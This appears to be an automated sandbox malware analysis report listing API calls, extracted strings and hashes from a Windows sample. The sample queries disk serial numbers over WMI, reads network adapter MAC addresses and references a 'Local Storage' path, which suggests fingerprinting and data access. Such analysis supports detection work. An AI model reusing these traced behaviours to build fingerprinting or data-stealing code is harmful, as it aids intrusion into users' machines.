                                                                                                                                              • WQL, xrefs: 0040A213
                                                                                                                                              • SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE2', xrefs: 0040A1F6
                                                                                                                                              • ROOT\CIMV2, xrefs: 0040A1A0
                                                                                                                                              • SerialNumber, xrefs: 0040A26B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BlanketCreateInstanceProxyVersion
                                                                                                                                              • String ID: ROOT\CIMV2$SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE0'$SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE1'$SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE2'$SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE3'$SerialNumber$WQL
                                                                                                                                              • API String ID: 4052488553-668480656
                                                                                                                                              • Opcode ID: 2f43b8abd95bdce89a6337ee62f48717bf7de744291fe96b5a40e21d1573a07e
                                                                                                                                              • Instruction ID: f8abb40f569aaa07a23fa9f41c399833c975962cf1a17763c5e18912e3785d52
                                                                                                                                              • Opcode Fuzzy Hash: 2f43b8abd95bdce89a6337ee62f48717bf7de744291fe96b5a40e21d1573a07e
                                                                                                                                              • Instruction Fuzzy Hash: 00718C71640318ABCB20DF95CC48EEE3BB9FF49B54F20056AF919D7290C3799845CBA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578000
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578019
                                                                                                                                                • Part of subcall function 025C6A20: SetLastError.KERNEL32(00000000), ref: 025C6AE3
                                                                                                                                                • Part of subcall function 025C6A20: GetLastError.KERNEL32 ref: 025C6AF8
                                                                                                                                                • Part of subcall function 025C6A20: GetLastError.KERNEL32 ref: 025C6B0A
                                                                                                                                                • Part of subcall function 025C6A20: HeapFree.KERNEL32(00000000,00000002), ref: 025C6B80
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578508
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257858A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025785DC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025786AF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025786CC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorLast
                                                                                                                                              • String ID: `async fn` resumed after completion
                                                                                                                                              • API String ID: 2332451156-507674517
                                                                                                                                              • Opcode ID: cfa46201193adb776f493bcbb43c7011bef27aecd89b113c212518ba097d8b2e
                                                                                                                                              • Instruction ID: 2b8454c5b78f2dd40dcbfedcea92cb83bcda5a728af3faad39df0aedf03a157b
                                                                                                                                              • Opcode Fuzzy Hash: cfa46201193adb776f493bcbb43c7011bef27aecd89b113c212518ba097d8b2e
                                                                                                                                              • Instruction Fuzzy Hash: 8F32D170A44742DFD725CF24C884BAAFBE2BF89304F04862DD59C9B251DB70A854DF96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetStdHandle.KERNEL32 ref: 025C0307
                                                                                                                                              • GetLastError.KERNEL32 ref: 025C0316
                                                                                                                                              • GetConsoleMode.KERNEL32(00000000,?), ref: 025C0354
                                                                                                                                              • NtWriteFile.NTDLL ref: 025C03DF
                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 025C03EF
                                                                                                                                              • RtlNtStatusToDosError.NTDLL ref: 025C0472
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 025C067A
                                                                                                                                              Strings
                                                                                                                                              • called `Result::unwrap()` on an `Err` value, xrefs: 025C0634
                                                                                                                                              • Invalid, xrefs: 025C059B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorHandle$CloseConsoleFileLastModeObjectSingleStatusWaitWrite
                                                                                                                                              • String ID: Invalid$called `Result::unwrap()` on an `Err` value
                                                                                                                                              • API String ID: 3090192319-3400594596
                                                                                                                                              • Opcode ID: c6afcc8765b6eb20b382de2fe1646282240d89365e3df07ce24e392624448a11
                                                                                                                                              • Instruction ID: b57f3a1bf8fcad6775563a3b5b27c007c1248198da6c0b3c2c6692914da113eb
                                                                                                                                              • Opcode Fuzzy Hash: c6afcc8765b6eb20b382de2fe1646282240d89365e3df07ce24e392624448a11
                                                                                                                                              • Instruction Fuzzy Hash: C3B18DB0A04249DFDF10CFA4C8847EEBFB5BF44704F24841DE856AB281E775A989CB65
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              • nown, xrefs: 025A435E
                                                                                                                                              • top\Local Storage\, xrefs: 025A330E
                                                                                                                                              • ;rn, xrefs: 025A3F92
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 025A4515
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs$nown$top\Local Storage\$;rn
                                                                                                                                              • API String ID: 0-1636215252
                                                                                                                                              • Opcode ID: 15458addc6cc74e10d8e99bbe1a9ba6def92089331e69ccdb99d4a0f8679d0ad
                                                                                                                                              • Instruction ID: f3ef5603ee451fbe31cbe8849a4a575d9d89ff371bacf8974102e971737d1af8
                                                                                                                                              • Opcode Fuzzy Hash: 15458addc6cc74e10d8e99bbe1a9ba6def92089331e69ccdb99d4a0f8679d0ad
                                                                                                                                              • Instruction Fuzzy Hash: 72627A71908382CFD724CF28C49179AFBE1BFC9304F158A6EE89997351DB70A945CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025C0C80: TlsGetValue.KERNEL32(00000000,?,025CF3A0), ref: 025C0C90
                                                                                                                                              • AcquireSRWLockShared.KERNEL32(02620AF4), ref: 025CF3FE
                                                                                                                                              • ReleaseSRWLockShared.KERNEL32(02620AF4), ref: 025CF5A2
                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 025CF7F0
                                                                                                                                                • Part of subcall function 025BF580: HeapFree.KERNEL32(00000000,00000000,?,025CF991), ref: 025BF59C
                                                                                                                                                • Part of subcall function 025BF580: HeapFree.KERNEL32(00000000,?,?,025CF991), ref: 025BF5B6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Lock$FreeHeapReleaseShared$AcquireExclusiveValue
                                                                                                                                              • String ID: Box<dyn Any><unnamed>$Invalid$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs
                                                                                                                                              • API String ID: 1439667220-2178555723
                                                                                                                                              • Opcode ID: 1e17261340cd820c7bca7fd5caa5fa59d2bec53525ba24ef7e867814adf92444
                                                                                                                                              • Instruction ID: 16c31f649e209e0fe7334d6413f17862af8d2de961258428bc58fceaccf30149
                                                                                                                                              • Opcode Fuzzy Hash: 1e17261340cd820c7bca7fd5caa5fa59d2bec53525ba24ef7e867814adf92444
                                                                                                                                              • Instruction Fuzzy Hash: 880253B0504B418FE734CF65C584753BBE2BB45308F24891ED89A87B82E7B6F448CBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00001000,?,?,FFFFFFFF,?,025C04CA,?,?), ref: 025C06FA
                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000,?,?,FFFFFFFF,?,025C04CA,?), ref: 025C0727
                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,00000000,00000000,00000000,?,?,FFFFFFFF,?,025C04CA,?), ref: 025C0775
                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,FFFFFFFF,?,025C04CA,?), ref: 025C0993
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConsoleWrite$ByteCharErrorLastMultiWide
                                                                                                                                              • String ID: Invalid$error_len
                                                                                                                                              • API String ID: 3036337926-3343129532
                                                                                                                                              • Opcode ID: 7932a7986847aa983057a8fbaf68b44f35c52c60a6344a4e009c62235e45fccc
                                                                                                                                              • Instruction ID: dabf49042b6ec4b89ce32cd2daa69b61abfa8041e1ba5291d6e5b8cd77c7be51
                                                                                                                                              • Opcode Fuzzy Hash: 7932a7986847aa983057a8fbaf68b44f35c52c60a6344a4e009c62235e45fccc
                                                                                                                                              • Instruction Fuzzy Hash: 739177759193418EE3169A39D442776B794BFE6384F14CB2EFED4B32C1FB31A4899208
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000,?,?,00403AB3,00000000,00000000,00000000,00000032), ref: 00402D7B
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00403AB3,00000000,00000000,00000000,00000032), ref: 00402D90
                                                                                                                                              • GetAdaptersInfo.IPHLPAPI(?), ref: 00402DB3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$AdaptersFreeInfoLoad
                                                                                                                                              • String ID: %02X-%02X-%02X-%02X-%02X-%02X$(1D$iphlpapi.dll
                                                                                                                                              • API String ID: 2815801046-1156694461
                                                                                                                                              • Opcode ID: 667fbff6e5fb93a3dbdba40f8899a0c99632f19625a976099da760c66a306bb6
                                                                                                                                              • Instruction ID: 0f46a71ea7f385b85266391789cee45fc69f055f165f50e350831578ad950e10
                                                                                                                                              • Opcode Fuzzy Hash: 667fbff6e5fb93a3dbdba40f8899a0c99632f19625a976099da760c66a306bb6
                                                                                                                                              • Instruction Fuzzy Hash: 092127B1910160AECB169BA4DD58DFE7BB8AF09704F1006BFF015F21E1C7BC89008769
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 0042738F
                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 0042739E
                                                                                                                                              • PathIsUNCA.SHLWAPI(?,?,?), ref: 004273D1
                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004273E9
                                                                                                                                              • CharUpperA.USER32(?), ref: 004273FA
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00427410
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0042741C
                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 0042742C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FindPath$CharCloseFileFirstFullInformationNameUpperVolumelstrcpylstrcpyn
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4238114063-0
                                                                                                                                              • Opcode ID: d785ae596bc36cb49a6f511f2bb699120d703fbd36700d512b5beef6b0218590
                                                                                                                                              • Instruction ID: ccc9f5d38c50f98e637bc9214232b1860236d421002e11859fbdac53a034a38f
                                                                                                                                              • Opcode Fuzzy Hash: d785ae596bc36cb49a6f511f2bb699120d703fbd36700d512b5beef6b0218590
                                                                                                                                              • Instruction Fuzzy Hash: 48316171600128ABCB10EF61EC48AEFBF78FF49354F908576F909D6151D7349A45CBA8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: assertion failed: d.mant + d.plus < (1 << 61)$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: d.plus > 0$assertion failed: edelta >= 0library\core\src\num\diy_float.rs$attempt to divide by zero
                                                                                                                                              • API String ID: 0-4042176451
                                                                                                                                              • Opcode ID: 78b580b8b07ee46674d64509a635b7dcdc570486e0dea744102eb26dbb48e890
                                                                                                                                              • Instruction ID: 0e11976b6b3a0f3b43979067b849d5bd75e70fee85a35e947c8874cd3536d5e5
                                                                                                                                              • Opcode Fuzzy Hash: 78b580b8b07ee46674d64509a635b7dcdc570486e0dea744102eb26dbb48e890
                                                                                                                                              • Instruction Fuzzy Hash: 8C722671A083519FD708CF29C48061AFBE6BFC8754F158A2EF899A7354D734EC498B86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000100), ref: 0040A465
                                                                                                                                              • SetPriorityClass.KERNEL32(00000000), ref: 0040A46C
                                                                                                                                              • CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,04000000,00000000), ref: 0040A4A0
                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,00000001,00000000,00000000,?,00000004,?,00000000), ref: 0040A4C5
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A4CC
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020), ref: 0040A52C
                                                                                                                                              • SetPriorityClass.KERNEL32(00000000), ref: 0040A533
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClassCurrentPriorityProcess$CloseControlCreateDeviceFileHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2852580560-0
                                                                                                                                              • Opcode ID: 65ca535f78cc64cf9aea046d4da315f8869e2603256f29e9bdf8a66fe15ff912
                                                                                                                                              • Instruction ID: 09672a527c137082c86a82ddad234cb0f4bb7b68b2f76d9faa745a067a63ae63
                                                                                                                                              • Opcode Fuzzy Hash: 65ca535f78cc64cf9aea046d4da315f8869e2603256f29e9bdf8a66fe15ff912
                                                                                                                                              • Instruction Fuzzy Hash: 932108B6A00218BFE7109BA49C88AEE776CEB45748F5040B5F501E31D0D7789D868B7A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              • assertion failed: self.ref_count() > 0, xrefs: 025D5230
                                                                                                                                              • [internal exception] blocking task ran twice./registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\task.rs, xrefs: 025D52C9
                                                                                                                                              • attempt to divide by zero, xrefs: 025D521C
                                                                                                                                              • Invalid, xrefs: 025D528D
                                                                                                                                              • attempt to calculate the remainder with a divisor of zero/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\core\src\slice\sort.rs, xrefs: 025D51D6, 025D51EA
                                                                                                                                              • assertion failed: next.is_notified()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\state.rs, xrefs: 025D5208
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 025D5325
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$FreeHeap
                                                                                                                                              • String ID: Invalid$[internal exception] blocking task ran twice./registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\task.rs$assertion failed: next.is_notified()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\state.rs$assertion failed: self.ref_count() > 0$attempt to calculate the remainder with a divisor of zero/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\core\src\slice\sort.rs$attempt to divide by zero$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs
                                                                                                                                              • API String ID: 911738859-2440271640
                                                                                                                                              • Opcode ID: 46201807224a08e332187ef9d7b5f2ac6c20bb220eadb25c7c7c50eb4a90d572
                                                                                                                                              • Instruction ID: e4ba71ace724c479d32c84785a4fc5a3a26236bc14bc1b171ed3b58966fab296
                                                                                                                                              • Opcode Fuzzy Hash: 46201807224a08e332187ef9d7b5f2ac6c20bb220eadb25c7c7c50eb4a90d572
                                                                                                                                              • Instruction Fuzzy Hash: 2CB293706043418FDB24CF28C49076ABBE2BFC8314F58896DE89A9B355DB70E845CF96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A3E4D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A4331
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A43AC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: nown$nown
                                                                                                                                              • API String ID: 3298025750-102062727
                                                                                                                                              • Opcode ID: 23fed63d7be421afa8db1cbc949aee9749d88e73cffd2b1c14694c141e5d4d6d
                                                                                                                                              • Instruction ID: 4f2b1b079cee191c4879d075fadfaa003d70cbeeec5403f1fa773fc210bea203
                                                                                                                                              • Opcode Fuzzy Hash: 23fed63d7be421afa8db1cbc949aee9749d88e73cffd2b1c14694c141e5d4d6d
                                                                                                                                              • Instruction Fuzzy Hash: AFC18A70908781DBD725CF28C451BAEFBF1BFC8304F108A5DE99997290D770A985CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • IsIconic.USER32(?), ref: 0040166A
                                                                                                                                                • Part of subcall function 004289E6: BeginPaint.USER32(?,?,?,?,0042292D), ref: 00428A19
                                                                                                                                              • SendMessageA.USER32(?,00000027,?,00000000), ref: 00401691
                                                                                                                                              • GetSystemMetrics.USER32(0000000B), ref: 0040169F
                                                                                                                                              • GetSystemMetrics.USER32(0000000C), ref: 004016A5
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004016B2
                                                                                                                                              • DrawIcon.USER32(?,?,?,?), ref: 004016EA
                                                                                                                                                • Part of subcall function 00428A41: EndPaint.USER32(?,?,?,?,00422953,?), ref: 00428A63
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1182735605-0
                                                                                                                                              • Opcode ID: 9409bb8eba40420717aaa7fd0813d9b11a5f1be16e6c6ee5dd2cc23651046658
                                                                                                                                              • Instruction ID: afd92d8a271adbd764b9b009a381ddf531eb1141bad508cde5b1c4dc8f1a29e6
                                                                                                                                              • Opcode Fuzzy Hash: 9409bb8eba40420717aaa7fd0813d9b11a5f1be16e6c6ee5dd2cc23651046658
                                                                                                                                              • Instruction Fuzzy Hash: 081160B53043019FC224EF78DD89E5B77A9ABD8214F844A3DF586C3290DA74E80ACA55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041882A: EnterCriticalSection.KERNEL32(?,?,?,0041540F,00000004,0043A458,0000000C,00418764,76170A60,?,00419CD6,00419D7E,00415EBE,?,0043A478,00000060), ref: 00418852
                                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000007,?,?,00000000,00000006,00000006,?,0041E2EE,00418484,?,?,0000003C,00000000,?,?,0000003C), ref: 0041DEAD
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044B4B4,000000FF,0000003F,00000000,?,?,00000000,00000006,00000006,?,0041E2EE,00418484,?), ref: 0041DF39
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044B508,000000FF,0000003F,00000000,?,?,00000000,00000006,00000006,?,0041E2EE,00418484,?), ref: 0041DF6B
                                                                                                                                                • Part of subcall function 00418796: LeaveCriticalSection.KERNEL32(?,004153AC,00000004,00415372,0043A448,0000000C,004153BE,000000E0,004153E9,?,004187CB,00000018,76170A60,?,?,00418843), ref: 004187A3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharCriticalMultiSectionWide$EnterInformationLeaveTimeZone
                                                                                                                                              • String ID: LD$`LD
                                                                                                                                              • API String ID: 2882866139-3452085429
                                                                                                                                              • Opcode ID: 3a1ce0b5cb7e44d9997b0b6c4af26172a2f4434b0736f3dcb0848fd7b5d39ad8
                                                                                                                                              • Instruction ID: 9d7b8684f2b8dc08f448c479742face438cddb3c02e48bd0b6daa426eba2df3e
                                                                                                                                              • Opcode Fuzzy Hash: 3a1ce0b5cb7e44d9997b0b6c4af26172a2f4434b0736f3dcb0848fd7b5d39ad8
                                                                                                                                              • Instruction Fuzzy Hash: AE6149B4D052449FD7209F29ACC1BA67BA8EB42355B19013FF050D72A1DB388DC2CB9D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • lstrcpyA.KERNEL32(00000800,LOC), ref: 00429EAE
                                                                                                                                              • wsprintfA.USER32 ref: 00429EC2
                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00429ED2
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 00429EED
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoLibraryLoadLocalelstrcpywsprintf
                                                                                                                                              • String ID: LOC
                                                                                                                                              • API String ID: 2301429115-519433814
                                                                                                                                              • Opcode ID: 55c4f7f6bd3d83fe0638668a92045e554d39542dee11adfa9b5a70be7e0f19cc
                                                                                                                                              • Instruction ID: ba9a9e911526f724f6bd684c18380571f0978ced8412fde1539fc42cd5b17a32
                                                                                                                                              • Opcode Fuzzy Hash: 55c4f7f6bd3d83fe0638668a92045e554d39542dee11adfa9b5a70be7e0f19cc
